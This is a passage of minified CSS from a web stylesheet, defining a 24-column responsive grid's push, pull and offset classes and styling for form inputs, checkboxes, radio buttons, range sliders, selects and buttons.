-push-12{left:50%}.col-xs-push-13{left:54.16667%}.col-xs-push-14{left:58.33333%}.col-xs-push-15{left:62.5%}.col-xs-push-16{left:66.66667%}.col-xs-push-17{left:70.83333%}.col-xs-push-18{left:75%}.col-xs-push-19{left:79.16667%}.col-xs-push-20{left:83.33333%}.col-xs-push-21{left:87.5%}.col-xs-push-22{left:91.66667%}.col-xs-push-23{left:95.83333%}.col-xs-push-24{left:100%}.col-xs-offset-0{margin-left:0%}.col-xs-offset-1{margin-left:4.16667%}.col-xs-offset-2{margin-left:8.33333%}.col-xs-offset-3{margin-left:12.5%}.col-xs-offset-4{margin-left:16.66667%}.col-xs-offset-5{margin-left:20.83333%}.col-xs-offset-6{margin-left:25%}.col-xs-offset-7{margin-left:29.16667%}.col-xs-offset-8{margin-left:33.33333%}.col-xs-offset-9{margin-left:37.5%}.col-xs-offset-10{margin-left:41.66667%}.col-xs-offset-11{margin-left:45.83333%}.col-xs-offset-12{margin-left:50%}.col-xs-offset-13{margin-left:54.16667%}.col-xs-offset-14{margin-left:58.33333%}.col-xs-offset-15{margin-left:62.5%}.col-xs-offset-16{margin-left:66.66667%}.col-xs-offset-17{margin-left:70.83333%}.col-xs-offset-18{margin-left:75%}.col-xs-offset-19{margin-left:79.16667%}.col-xs-offset-20{margin-left:83.33333%}.col-xs-offset-21{margin-left:87.5%}.col-xs-offset-22{margin-left:91.66667%}.col-xs-offset-23{margin-left:95.83333%}.col-xs-offset-24{margin-left:100%}@media(min-width:540px){.col-sm-1,.col-sm-2,.col-sm-3,.col-sm-4,.col-sm-5,.col-sm-6,.col-sm-7,.col-sm-8,.col-sm-9,.col-sm-10,.col-sm-11,.col-sm-12,.col-sm-13,.col-sm-14,.col-sm-15,.col-sm-16,.col-sm-17,.col-sm-18,.col-sm-19,.col-sm-20,.col-sm-21,.col-sm-22,.col-sm-23,.col-sm-24{float:left}.col-sm-1{width:4.16667%}.col-sm-2{width:8.33333%}.col-sm-3{width:12.5%}.col-sm-4{width:16.66667%}.col-sm-5{width:20.83333%}.col-sm-6{width:25%}.col-sm-7{width:29.16667%}.col-sm-8{width:33.33333%}.col-sm-9{width:37.5%}.col-sm-10{width:41.66667%}.col-sm-11{width:45.83333%}.col-sm-12{width:50%}.col-sm-13{width:54.16667%}.col-sm-14{width:58.33333%}.col-sm-15{width:62.5%}.col-sm-16{width:66.66667%}.col-sm-17{width:70.83333%}.col-sm-18{width:75%}.col-sm-19{width:79.16667%}.col-sm-20{width:83.33333%}.col-sm-21{width:87.5%}.col-sm-22{width:91.66667%}.col-sm-23{width:95.83333%}.col-sm-24{width:100%}.col-sm-pull-0{right:auto}.col-sm-pull-1{right:4.16667%}.col-sm-pull-2{right:8.33333%}.col-sm-pull-3{right:12.5%}.col-sm-pull-4{right:16.66667%}.col-sm-pull-5{right:20.83333%}.col-sm-pull-6{right:25%}.col-sm-pull-7{right:29.16667%}.col-sm-pull-8{right:33.33333%}.col-sm-pull-9{right:37.5%}.col-sm-pull-10{right:41.66667%}.col-sm-pull-11{right:45.83333%}.col-sm-pull-12{right:50%}.col-sm-pull-13{right:54.16667%}.col-sm-pull-14{right:58.33333%}.col-sm-pull-15{right:62.5%}.col-sm-pull-16{right:66.66667%}.col-sm-pull-17{right:70.83333%}.col-sm-pull-18{right:75%}.col-sm-pull-19{right:79.16667%}.col-sm-pull-20{right:83.33333%}.col-sm-pull-21{right:87.5%}.col-sm-pull-22{right:91.66667%}.col-sm-pull-23{right:95.83333%}.col-sm-pull-24{right:100%}.col-sm-push-0{left:auto}.col-sm-push-1{left:4.16667%}.col-sm-push-2{left:8.33333%}.col-sm-push-3{left:12.5%}.col-sm-push-4{left:16.66667%}.col-sm-push-5{left:20.83333%}.col-sm-push-6{left:25%}.col-sm-push-7{left:29.16667%}.col-sm-push-8{left:33.33333%}.col-sm-push-9{left:37.5%}.col-sm-push-10{left:41.66667%}.col-sm-push-11{left:45.83333%}.col-sm-push-12{left:50%}.col-sm-push-13{left:54.16667%}.col-sm-push-14{left:58.33333%}.col-sm-push-15{left:62.5%}.col-sm-push-16{left:66.66667%}.col-sm-push-17{left:70.83333%}.col-sm-push-18{left:75%}.col-sm-push-19{left:79.16667%}.col-sm-push-20{left:83.33333%}.col-sm-push-21{left:87.5%}.col-sm-push-22{left:91.66667%}.col-sm-push-23{left:95.83333%}.col-sm-push-24{left:100%}.col-sm-offset-0{margin-left:0%}.col-sm-offset-1{margin-left:4.16667%}.col-sm-offset-2{margin-left:8.33333%}.col-sm-offset-3{margin-left:12.5%}.col-sm-offset-4{margin-left:16.66667%}.col-sm-offset-5{margin-left:20.83333%}.col-sm-offset-6{margin-left:25%}.col-sm-offset-7{margin-left:29.16667%}.col-sm-offset-8{margin-left:33.33333%}.col-sm-offset-9{margin-left:37.5%}.col-sm-offset-10{margin-left:41.66667%}.col-sm-offset-11{margin-left:45.83333%}.col-sm-offset-12{margin-left:50%}.col-sm-offset-13{margin-left:54.16667%}.col-sm-offset-14{margin-left:58.33333%}.col-sm-offset-15{margin-left:62.5%}.col-sm-offset-16{margin-left:66.66667%}.col-sm-offset-17{margin-left:70.83333%}.col-sm-offset-18{margin-left:75%}.col-sm-offset-19{margin-left:79.16667%}.col-sm-offset-20{margin-left:83.33333%}.col-sm-offset-21{margin-left:87.5%}.col-sm-offset-22{margin-left:91.66667%}.col-sm-offset-23{margin-left:95.83333%}.col-sm-offset-24{margin-left:100%}}@media(min-width:768px){.col-md-1,.col-md-2,.col-md-3,.col-md-4,.col-md-5,.col-md-6,.col-md-7,.col-md-8,.col-md-9,.col-md-10,.col-md-11,.col-md-12,.col-md-13,.col-md-14,.col-md-15,.col-md-16,.col-md-17,.col-md-18,.col-md-19,.col-md-20,.col-md-21,.col-md-22,.col-md-23,.col-md-24{float:left}.col-md-1{width:4.16667%}.col-md-2{width:8.33333%}.col-md-3{width:12.5%}.col-md-4{width:16.66667%}.col-md-5{width:20.83333%}.col-md-6{width:25%}.col-md-7{width:29.16667%}.col-md-8{width:33.33333%}.col-md-9{width:37.5%}.col-md-10{width:41.66667%}.col-md-11{width:45.83333%}.col-md-12{width:50%}.col-md-13{width:54.16667%}.col-md-14{width:58.33333%}.col-md-15{width:62.5%}.col-md-16{width:66.66667%}.col-md-17{width:70.83333%}.col-md-18{width:75%}.col-md-19{width:79.16667%}.col-md-20{width:83.33333%}.col-md-21{width:87.5%}.col-md-22{width:91.66667%}.col-md-23{width:95.83333%}.col-md-24{width:100%}.col-md-pull-0{right:auto}.col-md-pull-1{right:4.16667%}.col-md-pull-2{right:8.33333%}.col-md-pull-3{right:12.5%}.col-md-pull-4{right:16.66667%}.col-md-pull-5{right:20.83333%}.col-md-pull-6{right:25%}.col-md-pull-7{right:29.16667%}.col-md-pull-8{right:33.33333%}.col-md-pull-9{right:37.5%}.col-md-pull-10{right:41.66667%}.col-md-pull-11{right:45.83333%}.col-md-pull-12{right:50%}.col-md-pull-13{right:54.16667%}.col-md-pull-14{right:58.33333%}.col-md-pull-15{right:62.5%}.col-md-pull-16{right:66.66667%}.col-md-pull-17{right:70.83333%}.col-md-pull-18{right:75%}.col-md-pull-19{right:79.16667%}.col-md-pull-20{right:83.33333%}.col-md-pull-21{right:87.5%}.col-md-pull-22{right:91.66667%}.col-md-pull-23{right:95.83333%}.col-md-pull-24{right:100%}.col-md-push-0{left:auto}.col-md-push-1{left:4.16667%}.col-md-push-2{left:8.33333%}.col-md-push-3{left:12.5%}.col-md-push-4{left:16.66667%}.col-md-push-5{left:20.83333%}.col-md-push-6{left:25%}.col-md-push-7{left:29.16667%}.col-md-push-8{left:33.33333%}.col-md-push-9{left:37.5%}.col-md-push-10{left:41.66667%}.col-md-push-11{left:45.83333%}.col-md-push-12{left:50%}.col-md-push-13{left:54.16667%}.col-md-push-14{left:58.33333%}.col-md-push-15{left:62.5%}.col-md-push-16{left:66.66667%}.col-md-push-17{left:70.83333%}.col-md-push-18{left:75%}.col-md-push-19{left:79.16667%}.col-md-push-20{left:83.33333%}.col-md-push-21{left:87.5%}.col-md-push-22{left:91.66667%}.col-md-push-23{left:95.83333%}.col-md-push-24{left:100%}.col-md-offset-0{margin-left:0%}.col-md-offset-1{margin-left:4.16667%}.col-md-offset-2{margin-left:8.33333%}.col-md-offset-3{margin-left:12.5%}.col-md-offset-4{margin-left:16.66667%}.col-md-offset-5{margin-left:20.83333%}.col-md-offset-6{margin-left:25%}.col-md-offset-7{margin-left:29.16667%}.col-md-offset-8{margin-left:33.33333%}.col-md-offset-9{margin-left:37.5%}.col-md-offset-10{margin-left:41.66667%}.col-md-offset-11{margin-left:45.83333%}.col-md-offset-12{margin-left:50%}.col-md-offset-13{margin-left:54.16667%}.col-md-offset-14{margin-left:58.33333%}.col-md-offset-15{margin-left:62.5%}.col-md-offset-16{margin-left:66.66667%}.col-md-offset-17{margin-left:70.83333%}.col-md-offset-18{margin-left:75%}.col-md-offset-19{margin-left:79.16667%}.col-md-offset-20{margin-left:83.33333%}.col-md-offset-21{margin-left:87.5%}.col-md-offset-22{margin-left:91.66667%}.col-md-offset-23{margin-left:95.83333%}.col-md-offset-24{margin-left:100%}}@media(min-width:992px){.col-lg-1,.col-lg-2,.col-lg-3,.col-lg-4,.col-lg-5,.col-lg-6,.col-lg-7,.col-lg-8,.col-lg-9,.col-lg-10,.col-lg-11,.col-lg-12,.col-lg-13,.col-lg-14,.col-lg-15,.col-lg-16,.col-lg-17,.col-lg-18,.col-lg-19,.col-lg-20,.col-lg-21,.col-lg-22,.col-lg-23,.col-lg-24{float:left}.col-lg-1{width:4.16667%}.col-lg-2{width:8.33333%}.col-lg-3{width:12.5%}.col-lg-4{width:16.66667%}.col-lg-5{width:20.83333%}.col-lg-6{width:25%}.col-lg-7{width:29.16667%}.col-lg-8{width:33.33333%}.col-lg-9{width:37.5%}.col-lg-10{width:41.66667%}.col-lg-11{width:45.83333%}.col-lg-12{width:50%}.col-lg-13{width:54.16667%}.col-lg-14{width:58.33333%}.col-lg-15{width:62.5%}.col-lg-16{width:66.66667%}.col-lg-17{width:70.83333%}.col-lg-18{width:75%}.col-lg-19{width:79.16667%}.col-lg-20{width:83.33333%}.col-lg-21{width:87.5%}.col-lg-22{width:91.66667%}.col-lg-23{width:95.83333%}.col-lg-24{width:100%}.col-lg-pull-0{right:auto}.col-lg-pull-1{right:4.16667%}.col-lg-pull-2{right:8.33333%}.col-lg-pull-3{right:12.5%}.col-lg-pull-4{right:16.66667%}.col-lg-pull-5{right:20.83333%}.col-lg-pull-6{right:25%}.col-lg-pull-7{right:29.16667%}.col-lg-pull-8{right:33.33333%}.col-lg-pull-9{right:37.5%}.col-lg-pull-10{right:41.66667%}.col-lg-pull-11{right:45.83333%}.col-lg-pull-12{right:50%}.col-lg-pull-13{right:54.16667%}.col-lg-pull-14{right:58.33333%}.col-lg-pull-15{right:62.5%}.col-lg-pull-16{right:66.66667%}.col-lg-pull-17{right:70.83333%}.col-lg-pull-18{right:75%}.col-lg-pull-19{right:79.16667%}.col-lg-pull-20{right:83.33333%}.col-lg-pull-21{right:87.5%}.col-lg-pull-22{right:91.66667%}.col-lg-pull-23{right:95.83333%}.col-lg-pull-24{right:100%}.col-lg-push-0{left:auto}.col-lg-push-1{left:4.16667%}.col-lg-push-2{left:8.33333%}.col-lg-push-3{left:12.5%}.col-lg-push-4{left:16.66667%}.col-lg-push-5{left:20.83333%}.col-lg-push-6{left:25%}.col-lg-push-7{left:29.16667%}.col-lg-push-8{left:33.33333%}.col-lg-push-9{left:37.5%}.col-lg-push-10{left:41.66667%}.col-lg-push-11{left:45.83333%}.col-lg-push-12{left:50%}.col-lg-push-13{left:54.16667%}.col-lg-push-14{left:58.33333%}.col-lg-push-15{left:62.5%}.col-lg-push-16{left:66.66667%}.col-lg-push-17{left:70.83333%}.col-lg-push-18{left:75%}.col-lg-push-19{left:79.16667%}.col-lg-push-20{left:83.33333%}.col-lg-push-21{left:87.5%}.col-lg-push-22{left:91.66667%}.col-lg-push-23{left:95.83333%}.col-lg-push-24{left:100%}.col-lg-offset-0{margin-left:0%}.col-lg-offset-1{margin-left:4.16667%}.col-lg-offset-2{margin-left:8.33333%}.col-lg-offset-3{margin-left:12.5%}.col-lg-offset-4{margin-left:16.66667%}.col-lg-offset-5{margin-left:20.83333%}.col-lg-offset-6{margin-left:25%}.col-lg-offset-7{margin-left:29.16667%}.col-lg-offset-8{margin-left:33.33333%}.col-lg-offset-9{margin-left:37.5%}.col-lg-offset-10{margin-left:41.66667%}.col-lg-offset-11{margin-left:45.83333%}.col-lg-offset-12{margin-left:50%}.col-lg-offset-13{margin-left:54.16667%}.col-lg-offset-14{margin-left:58.33333%}.col-lg-offset-15{margin-left:62.5%}.col-lg-offset-16{margin-left:66.66667%}.col-lg-offset-17{margin-left:70.83333%}.col-lg-offset-18{margin-left:75%}.col-lg-offset-19{margin-left:79.16667%}.col-lg-offset-20{margin-left:83.33333%}.col-lg-offset-21{margin-left:87.5%}.col-lg-offset-22{margin-left:91.66667%}.col-lg-offset-23{margin-left:95.83333%}.col-lg-offset-24{margin-left:100%}}@media(min-width:1400px){.col-xl-1,.col-xl-2,.col-xl-3,.col-xl-4,.col-xl-5,.col-xl-6,.col-xl-7,.col-xl-8,.col-xl-9,.col-xl-10,.col-xl-11,.col-xl-12,.col-xl-13,.col-xl-14,.col-xl-15,.col-xl-16,.col-xl-17,.col-xl-18,.col-xl-19,.col-xl-20,.col-xl-21,.col-xl-22,.col-xl-23,.col-xl-24{float:left}.col-xl-1{width:4.16667%}.col-xl-2{width:8.33333%}.col-xl-3{width:12.5%}.col-xl-4{width:16.66667%}.col-xl-5{width:20.83333%}.col-xl-6{width:25%}.col-xl-7{width:29.16667%}.col-xl-8{width:33.33333%}.col-xl-9{width:37.5%}.col-xl-10{width:41.66667%}.col-xl-11{width:45.83333%}.col-xl-12{width:50%}.col-xl-13{width:54.16667%}.col-xl-14{width:58.33333%}.col-xl-15{width:62.5%}.col-xl-16{width:66.66667%}.col-xl-17{width:70.83333%}.col-xl-18{width:75%}.col-xl-19{width:79.16667%}.col-xl-20{width:83.33333%}.col-xl-21{width:87.5%}.col-xl-22{width:91.66667%}.col-xl-23{width:95.83333%}.col-xl-24{width:100%}.col-xl-pull-0{right:auto}.col-xl-pull-1{right:4.16667%}.col-xl-pull-2{right:8.33333%}.col-xl-pull-3{right:12.5%}.col-xl-pull-4{right:16.66667%}.col-xl-pull-5{right:20.83333%}.col-xl-pull-6{right:25%}.col-xl-pull-7{right:29.16667%}.col-xl-pull-8{right:33.33333%}.col-xl-pull-9{right:37.5%}.col-xl-pull-10{right:41.66667%}.col-xl-pull-11{right:45.83333%}.col-xl-pull-12{right:50%}.col-xl-pull-13{right:54.16667%}.col-xl-pull-14{right:58.33333%}.col-xl-pull-15{right:62.5%}.col-xl-pull-16{right:66.66667%}.col-xl-pull-17{right:70.83333%}.col-xl-pull-18{right:75%}.col-xl-pull-19{right:79.16667%}.col-xl-pull-20{right:83.33333%}.col-xl-pull-21{right:87.5%}.col-xl-pull-22{right:91.66667%}.col-xl-pull-23{right:95.83333%}.col-xl-pull-24{right:100%}.col-xl-push-0{left:auto}.col-xl-push-1{left:4.16667%}.col-xl-push-2{left:8.33333%}.col-xl-push-3{left:12.5%}.col-xl-push-4{left:16.66667%}.col-xl-push-5{left:20.83333%}.col-xl-push-6{left:25%}.col-xl-push-7{left:29.16667%}.col-xl-push-8{left:33.33333%}.col-xl-push-9{left:37.5%}.col-xl-push-10{left:41.66667%}.col-xl-push-11{left:45.83333%}.col-xl-push-12{left:50%}.col-xl-push-13{left:54.16667%}.col-xl-push-14{left:58.33333%}.col-xl-push-15{left:62.5%}.col-xl-push-16{left:66.66667%}.col-xl-push-17{left:70.83333%}.col-xl-push-18{left:75%}.col-xl-push-19{left:79.16667%}.col-xl-push-20{left:83.33333%}.col-xl-push-21{left:87.5%}.col-xl-push-22{left:91.66667%}.col-xl-push-23{left:95.83333%}.col-xl-push-24{left:100%}.col-xl-offset-0{margin-left:0%}.col-xl-offset-1{margin-left:4.16667%}.col-xl-offset-2{margin-left:8.33333%}.col-xl-offset-3{margin-left:12.5%}.col-xl-offset-4{margin-left:16.66667%}.col-xl-offset-5{margin-left:20.83333%}.col-xl-offset-6{margin-left:25%}.col-xl-offset-7{margin-left:29.16667%}.col-xl-offset-8{margin-left:33.33333%}.col-xl-offset-9{margin-left:37.5%}.col-xl-offset-10{margin-left:41.66667%}.col-xl-offset-11{margin-left:45.83333%}.col-xl-offset-12{margin-left:50%}.col-xl-offset-13{margin-left:54.16667%}.col-xl-offset-14{margin-left:58.33333%}.col-xl-offset-15{margin-left:62.5%}.col-xl-offset-16{margin-left:66.66667%}.col-xl-offset-17{margin-left:70.83333%}.col-xl-offset-18{margin-left:75%}.col-xl-offset-19{margin-left:79.16667%}.col-xl-offset-20{margin-left:83.33333%}.col-xl-offset-21{margin-left:87.5%}.col-xl-offset-22{margin-left:91.66667%}.col-xl-offset-23{margin-left:95.83333%}.col-xl-offset-24{margin-left:100%}}fieldset{padding:0;margin:0;border:0;min-width:0}legend{display:block;width:100%;padding:0;border:0}label{display:inline-block;max-width:100%}input[type=\"search\"]{-webkit-box-sizing:border-box;-moz-box-sizing:border-box;box-sizing:border-box}input[type=\"file\"]{display:block}input[type=\"range\"]{display:block;width:100%}select[multiple],select[size]{height:auto}input[type=\"file\"]:focus,input[type=\"radio\"]:focus,input[type=\"checkbox\"]:focus{outline:thin dotted;outline:5px auto -webkit-focus-ring-color;outline-offset:-2px}output{display:block;padding-top:7px}.form-control{display:block;width:100%;background-image:none}textarea.form-control{height:auto}input[type=\"search\"]{-webkit-appearance:none}input[type=\"date\"],input[type=\"time\"],input[type=\"datetime-local\"],input[type=\"month\"]{line-height:34px;line-height:1.42857 \\0}.radio,.checkbox{position:relative;display:block}.radio label,.checkbox label{min-height:20px;margin-bottom:0;cursor:pointer}.radio.disabled label,fieldset[disabled] .radio label,.checkbox.disabled label,fieldset[disabled] .checkbox label{cursor:not-allowed}.help-block{display:block;margin-top:5px;margin-bottom:10px}@media(min-width:540px){.form-inline .form-group{display:inline-block;margin-bottom:0;vertical-align:middle}.form-inline .form-control{display:inline-block;width:auto;vertical-align:middle}.form-inline .input-group{display:inline-table;vertical-align:middle}.form-inline .input-group .input-group-addon,.form-inline .input-group .input-group-btn,.form-inline .input-group .form-control{width:auto}.form-inline .input-group>.form-control{width:100%}.form-inline .control-label{margin-bottom:0;vertical-align:middle}.form-inline .radio,.form-inline .checkbox{display:inline-block;margin-top:0;margin-bottom:0;vertical-align:middle}}input,button,textarea,select,option,progress{max-width:100%;line-height:inherit}input[type=\"color\"],input[type=\"date\"],input[type=\"datetime\"],input[type=\"datetime-local\"],input[type=\"email\"],input[type=\"month\"],input[type=\"number\"],input[type=\"password\"],input[type=\"search\"],input[type=\"tel\"],input[type=\"text\"],input[type=\"time\"],input[type=\"url\"],input[type=\"week\"],textarea{padding:4px 8px;border-style:solid;border-width:2px;border-color:rgba(0,0,0,.4);background-color:rgba(255,255,255,.4);height:32px;height:2rem}input[type=\"color\"]:focus,input[type=\"date\"]:focus,input[type=\"datetime\"]:focus,input[type=\"datetime-local\"]:focus,input[type=\"email\"]:focus,input[type=\"month\"]:focus,input[type=\"number\"]:focus,input[type=\"password\"]:focus,input[type=\"search\"]:focus,input[type=\"tel\"]:focus,input[type=\"text\"]:focus,input[type=\"time\"]:focus,input[type=\"url\"]:focus,input[type=\"week\"]:focus,textarea:focus{border-color:#0067b8;background-color:#fff}input[type=\"color\"]::-moz-placeholder,input[type=\"date\"]::-moz-placeholder,input[type=\"datetime\"]::-moz-placeholder,input[type=\"datetime-local\"]::-moz-placeholder,input[type=\"email\"]::-moz-placeholder,input[type=\"month\"]::-moz-placeholder,input[type=\"number\"]::-moz-placeholder,input[type=\"password\"]::-moz-placeholder,input[type=\"search\"]::-moz-placeholder,input[type=\"tel\"]::-moz-placeholder,input[type=\"text\"]::-moz-placeholder,input[type=\"time\"]::-moz-placeholder,input[type=\"url\"]::-moz-placeholder,input[type=\"week\"]::-moz-placeholder,textarea::-moz-placeholder{color:rgba(0,0,0,.6);opacity:1}input[type=\"color\"]:-ms-input-placeholder,input[type=\"date\"]:-ms-input-placeholder,input[type=\"datetime\"]:-ms-input-placeholder,input[type=\"datetime-local\"]:-ms-input-placeholder,input[type=\"email\"]:-ms-input-placeholder,input[type=\"month\"]:-ms-input-placeholder,input[type=\"number\"]:-ms-input-placeholder,input[type=\"password\"]:-ms-input-placeholder,input[type=\"search\"]:-ms-input-placeholder,input[type=\"tel\"]:-ms-input-placeholder,input[type=\"text\"]:-ms-input-placeholder,input[type=\"time\"]:-ms-input-placeholder,input[type=\"url\"]:-ms-input-placeholder,input[type=\"week\"]:-ms-input-placeholder,textarea:-ms-input-placeholder{color:rgba(0,0,0,.6)}input[type=\"color\"]::-webkit-input-placeholder,input[type=\"date\"]::-webkit-input-placeholder,input[type=\"datetime\"]::-webkit-input-placeholder,input[type=\"datetime-local\"]::-webkit-input-placeholder,input[type=\"email\"]::-webkit-input-placeholder,input[type=\"month\"]::-webkit-input-placeholder,input[type=\"number\"]::-webkit-input-placeholder,input[type=\"password\"]::-webkit-input-placeholder,input[type=\"search\"]::-webkit-input-placeholder,input[type=\"tel\"]::-webkit-input-placeholder,input[type=\"text\"]::-webkit-input-placeholder,input[type=\"time\"]::-webkit-input-placeholder,input[type=\"url\"]::-webkit-input-placeholder,input[type=\"week\"]::-webkit-input-placeholder,textarea::-webkit-input-placeholder{color:rgba(0,0,0,.6)}input[type=\"color\"][disabled],input[type=\"color\"][readonly],fieldset[disabled] input[type=\"color\"],input[type=\"date\"][disabled],input[type=\"date\"][readonly],fieldset[disabled] input[type=\"date\"],input[type=\"datetime\"][disabled],input[type=\"datetime\"][readonly],fieldset[disabled] input[type=\"datetime\"],input[type=\"datetime-local\"][disabled],input[type=\"datetime-local\"][readonly],fieldset[disabled] input[type=\"datetime-local\"],input[type=\"email\"][disabled],input[type=\"email\"][readonly],fieldset[disabled] input[type=\"email\"],input[type=\"month\"][disabled],input[type=\"month\"][readonly],fieldset[disabled] input[type=\"month\"],input[type=\"number\"][disabled],input[type=\"number\"][readonly],fieldset[disabled] input[type=\"number\"],input[type=\"password\"][disabled],input[type=\"password\"][readonly],fieldset[disabled] input[type=\"password\"],input[type=\"search\"][disabled],input[type=\"search\"][readonly],fieldset[disabled] input[type=\"search\"],input[type=\"tel\"][disabled],input[type=\"tel\"][readonly],fieldset[disabled] input[type=\"tel\"],input[type=\"text\"][disabled],input[type=\"text\"][readonly],fieldset[disabled] input[type=\"text\"],input[type=\"time\"][disabled],input[type=\"time\"][readonly],fieldset[disabled] input[type=\"time\"],input[type=\"url\"][disabled],input[type=\"url\"][readonly],fieldset[disabled] input[type=\"url\"],input[type=\"week\"][disabled],input[type=\"week\"][readonly],fieldset[disabled] input[type=\"week\"],textarea[disabled],textarea[readonly],fieldset[disabled] textarea{border-color:#ccc!important;background-color:rgba(0,0,0,.2)!important;color:rgba(0,0,0,.2)!important}.form-group.has-error input[type=\"color\"],input[type=\"color\"].has-error,.form-group.has-error input[type=\"date\"],input[type=\"date\"].has-error,.form-group.has-error input[type=\"datetime\"],input[type=\"datetime\"].has-error,.form-group.has-error input[type=\"datetime-local\"],input[type=\"datetime-local\"].has-error,.form-group.has-error input[type=\"email\"],input[type=\"email\"].has-error,.form-group.has-error input[type=\"month\"],input[type=\"month\"].has-error,.form-group.has-error input[type=\"number\"],input[type=\"number\"].has-error,.form-group.has-error input[type=\"password\"],input[type=\"password\"].has-error,.form-group.has-error input[type=\"search\"],input[type=\"search\"].has-error,.form-group.has-error input[type=\"tel\"],input[type=\"tel\"].has-error,.form-group.has-error input[type=\"text\"],input[type=\"text\"].has-error,.form-group.has-error input[type=\"time\"],input[type=\"time\"].has-error,.form-group.has-error input[type=\"url\"],input[type=\"url\"].has-error,.form-group.has-error input[type=\"week\"],input[type=\"week\"].has-error,.form-group.has-error textarea,textarea.has-error{border-color:#e81123}textarea{height:auto}input::-ms-clear,input::-ms-reveal{height:100%;padding:4px 8px;margin-right:-8px;margin-left:4px;color:rgba(0,0,0,.6)}input::-ms-clear:hover,input::-ms-reveal:hover{color:#0067b8}input::-ms-clear:active,input::-ms-reveal:active{color:#fff;background-color:#0067b8}.form-group.has-error input::-ms-clear:hover,.form-group.has-error input::-ms-reveal:hover,input.has-error::-ms-clear:hover,input.has-error::-ms-reveal:hover{color:#e81123}.form-group.has-error input::-ms-clear:active,.form-group.has-error input::-ms-reveal:active,input.has-error::-ms-clear:active,input.has-error::-ms-reveal:active{color:#fff;background-color:#e81123}input[type=\"radio\"]{width:20px;height:20px}input[type=\"radio\"]::-ms-check{background-color:#fff;color:#000;border-style:solid;border-width:2px;border-color:rgba(0,0,0,.6)}input[type=\"radio\"]:checked::-ms-check{color:#000;border-color:#0067b8}input[type=\"radio\"]:hover::-ms-check{border-color:#000}input[type=\"radio\"]:hover:checked::-ms-check{border-color:#0067b8}input[type=\"radio\"]:active::-ms-check{color:rgba(0,0,0,.6);border-color:rgba(0,0,0,.6)}input[type=\"radio\"]:active:checked::-ms-check{border-color:rgba(0,0,0,.6)}input[type=\"radio\"][disabled]::-ms-check,fieldset[disabled] input[type=\"radio\"]::-ms-check{background-color:#fff!important;color:rgba(0,0,0,.2)!important;border-color:rgba(0,0,0,.2)!important}input[type=\"radio\"][disabled]:checked::-ms-check,fieldset[disabled] input[type=\"radio\"]:checked::-ms-check{color:rgba(0,0,0,.2)!important}input[type=\"checkbox\"]{width:20px;height:20px}input[type=\"checkbox\"]::-ms-check{border-style:solid;border-width:2px;background-color:transparent;color:#000;border-color:rgba(0,0,0,.8)}input[type=\"checkbox\"]:checked::-ms-check{background-color:#0067b8;border-color:#0067b8}input[type=\"checkbox\"]:hover::-ms-check{border-color:#000}input[type=\"checkbox\"]:active::-ms-check{background-color:rgba(0,0,0,.6);border-color:transparent}input[type=\"checkbox\"][disabled]::-ms-check,fieldset[disabled] input[type=\"checkbox\"]::-ms-check{border-color:rgba(0,0,0,.2)!important;background-color:transparent!important;color:rgba(0,0,0,.2)!important}progress{height:4px;border-style:none;color:#0067b8;background-color:#ccc;-webkit-appearance:none;display:block}progress::-ms-fill{color:#0067b8}progress::-webkit-progress-value{background-color:#0067b8}progress::-webkit-progress-bar{background-color:#ccc}progress::-moz-progress-bar{background-color:#0067b8}input[type=\"range\"]{height:42px;padding-bottom:16px;padding-top:16px;border-style:none}input[type=\"range\"]::-ms-track{height:2px;border-style:none;background-color:transparent;color:transparent}input[type=\"range\"]::-ms-fill-lower{background-color:#0067b8}input[type=\"range\"]::-ms-fill-upper{background-color:rgba(0,0,0,.4)}input[type=\"range\"]::-ms-thumb{background-color:#0067b8;width:24px;height:8px;border-radius:4px;border-style:none}input[type=\"range\"]:hover::-ms-thumb{background-color:#1f1f1f}input[type=\"range\"]:active::-ms-thumb{background-color:#ccc}input[type=\"range\"]:disabled::-ms-fill-lower,input[type=\"range\"]:disabled::-ms-fill-upper{background-color:rgba(0,0,0,.2)!important}input[type=\"range\"]:disabled::-ms-thumb{background-color:#ccc!important}legend{margin-bottom:12px}.form-group{margin-bottom:12px}.form-group label{margin-top:0;margin-bottom:8px}.radio,.checkbox{margin-top:12px;margin-bottom:12px}.radio label,.checkbox label{padding-left:28px}.radio input[type=\"radio\"],.radio-inline input[type=\"radio\"],.checkbox input[type=\"checkbox\"],.checkbox-inline input[type=\"checkbox\"]{position:absolute;margin-left:-28px}input[type=\"radio\"][disabled],input[type=\"radio\"].disabled,fieldset[disabled] input[type=\"radio\"],input[type=\"checkbox\"][disabled],input[type=\"checkbox\"].disabled,fieldset[disabled] input[type=\"checkbox\"]{cursor:not-allowed}input[type=\"radio\"][disabled]+span,input[type=\"radio\"].disabled+span,fieldset[disabled] input[type=\"radio\"]+span,input[type=\"checkbox\"][disabled]+span,input[type=\"checkbox\"].disabled+span,fieldset[disabled] input[type=\"checkbox\"]+span{color:rgba(0,0,0,.2)}select{border:2px solid rgba(0,0,0,.4);background-clip:padding-box;color:#000}select:focus{background-color:#3a96dd;outline:0}select:focus::-ms-value{background-color:#3a96dd;color:#000}select:focus option{background-color:#fff}select:hover{border-color:rgba(0,0,0,.6)}select:active{background-color:#fff}select option:focus{background-color:#3a96dd}select option:checked{background-color:#3a96dd;color:#000}select option:active{background-color:#767676;color:#000}select option:not(:checked):hover{background-color:#c5e1f7}select option:not(:checked):active{background-color:#767676;color:#000}select[multiple]:focus{background-color:#fff}select[disabled],select.disabled,fieldset[disabled] select{cursor:not-allowed;background-color:rgba(0,0,0,.2)!important;border-color:rgba(0,0,0,.2)!important;color:rgba(0,0,0,.6)!important}select[disabled] option:hover,select[disabled] option:focus,select[disabled] option:active,select.disabled option:hover,select.disabled option:focus,select.disabled option:active,fieldset[disabled] select option:hover,fieldset[disabled] select option:focus,fieldset[disabled] select option:active{background-color:transparent!important}::-ms-expand{margin:0 6px 0 20px;background-color:transparent;border:0}.btn-block{display:block;width:100%}.btn-block+.btn-block{margin-top:5px}input[type=\"submit\"].btn-block,input[type=\"reset\"].btn-block,input[type=\"button\"].btn-block{width:100%}.btn,button,input[type=\"button\"],input[type=\"submit\"],input[type=\"reset\"]{display:inline-block;min-width:100px;padding:4px 12px 4px 